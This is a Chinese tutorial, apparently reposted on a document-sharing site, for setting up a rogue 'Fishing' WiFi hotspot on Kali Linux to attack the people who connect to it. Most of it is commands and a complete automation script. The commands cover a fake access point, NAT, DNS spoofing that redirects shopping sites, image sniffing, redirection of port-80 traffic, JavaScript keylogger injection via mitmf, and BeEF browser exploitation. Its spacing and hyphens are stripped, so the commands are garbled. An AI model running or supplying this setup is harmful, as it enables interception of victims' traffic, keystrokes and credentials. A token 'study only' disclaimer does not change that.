1、利用Kali进行WiFi钓鱼测试实战学习写在前面注:此文具有攻击性,只能用于学习研究之用,禁止用于其他非法用途,否则后果自负. -Mrxn 20150612 搜集从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,XX都上不去。而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。建立热点工具:isc-dhcp-server ;Aircr
2、ack-ng套件;iptables建立过程:首先写dhcp配置文件/etc/dhcp/dhcpd.conf写入如下内容:authoritative;default-lease-time700;max-lease-time8000;subnet10.0.0.0netmask255.255.255.0optionrouters10.0.0.1;optionsubnet-mask255.255.255.0;optiondomain-name-servers10.0.0.1;range10.0.0.1010.0.0.100;这里以10.0.0.1作为网关和dns服务器地址。然后我们处理无线网卡ifco
3、nfigwlan1down#wlan1修改成你的网卡iwconfigwlan1modemonitorifconfigwlan1upairmon-ngstartwlan1上述命令可以防止出现:Error: Got channel -1, expected a value 0.然后用airbase建立热点airbase-ng-eFishing-c11mon0热点的网络流量会被虚拟到at0这块网卡上面ifconfigat0upifconfigat010.0.0.1netmask255.255.255.0routeadd-net10.0.0.0netmask255.255.255.0gw10.0.0.
4、1打开ip转发echo1/proc/sys/net/ipv4/ip_forward开启dhcpdhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pidat0serviceisc-dhcp-serverstart然后可以试着用手机连接,应该可以连上但上不了网于是配置NATiptables-tnat-APOSTROUTING-oeth0-jMASQUERADE#对eth0进行源natiptables-AFORWARD-iwlan1-oeth0-jACCEPT#把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面iptables-AFORWARD-ptc
5、p-syn-s10.0.0.0/24-jTCPMSS-set-mss1356#修改最大报文段长度注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)劫持DNS工具:dnschef过程:dnschef-i10.0.0.1-nameserver210.73.64.1#53上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效于是我们进化:dnschef-fakedomains=,-fakeip=10.0.0.1-
6、i10.0.0.1-nameserver210.73.64.1#53把淘宝和XX解析到本机了。当然可以把更多规则写在文件里:剩下的大家自由发挥吧。p.s:这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。图片嗅探这是一个很好玩的功能工具:driftnet过程:driftnet-iat0然后程序会打开一个小窗口显示所有传输的图片:单击图片保存到/当然可以开启Adjunct mode:driftnet-iat0-a直接保存图片并显示文件名。劫持Web流量这个更好玩工具:BEEF;mitmf;iptables过程:先把80端口的流量劫持走(这里10
7、000是mitmf默认监听端口)iptables-tnat-APREROUTING-ptcp-destination-port80-jREDIRECT-to-port10000然后打开mitmfmitmf-iat0-replace-search-straaaaa-replace-strbbbbb#把所有网页中的aaaaa替换成bbbbb上图XX了aaaaa好吧不要恶作剧了,上干货mitmf-iat0-inject-js-url-jskeyloggermitmf在这里注入了js键盘记录器最后用BEEF测试用户浏览器吧!/usr/share/beef-xss/beef浏览器打开 ,初始用户名和密码
8、都是beefBEEF过于高深我还没玩得很清楚请大家自行探索。对了,不要忘了抓包最后是我写的脚本#清空iptablesiptables-tnat-Fiptables-tnat-Xiptables-tnat-PPREROUTINGACCEPTiptables-tnat-PPOSTROUTINGACCEPTiptables-tnat-POUTPUTACCEPTiptables-tmangle-Fiptables-tmangle-Xiptables-tmangle-PPREROUTINGACCEPTiptables-tmangle-PINPUTACCEPTiptables-tmangle-PFORWA
9、RDACCEPTiptables-tmangle-POUTPUTACCEPTiptables-tmangle-PPOSTROUTINGACCEPTiptables-Fiptables-Xiptables-PFORWARDACCEPTiptables-PINPUTACCEPTiptables-POUTPUTACCEPTiptables-traw-Fiptables-traw-Xiptables-traw-PPREROUTINGACCEPTiptables-traw-POUTPUTACCEPT#建立热点airmon-ngstopmon0ifconfigwlan1down#wlan1修改成你的网卡i
10、wconfigwlan1modemonitorifconfigwlan1upairmon-ngstartwlan1&sleep2gnome-terminal-xbash-cairbase-ng-eFishing-c11mon0#按需求修改sleep2ifconfigat0upifconfigat010.0.0.1netmask255.255.255.0ifconfigat0mtu1400routeadd-net10.0.0.0netmask255.255.255.0gw10.0.0.1echo1/proc/sys/net/ipv4/ip_forward#配置dhcpdhcpd-cf/etc/d
11、hcp/dhcpd.conf-pf/var/run/dhcpd.pidat0sleep2/etc/init.d/isc-dhcp-serverstart#natiptables-tnat-APOSTROUTING-oeth0-jMASQUERADEiptables-AFORWARD-iwlan1-oeth0-jACCEPTiptables-AFORWARD-ptcp-syn-s10.0.0.0/24-jTCPMSS-set-mss1356#劫持80iptables-tnat-APREROUTING-ptcp-destination-port80-jREDIRECT-to-port10000#劫持dnsgnome-terminal-xbash-cdnschef-i10.0.0.1-nameserver210.73.64.1#53#打开beef并进行80js键盘记录gnome-terminal-xbash-cmitmf-iat0-inject-js-url-jskeyloggerbeef-xss
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1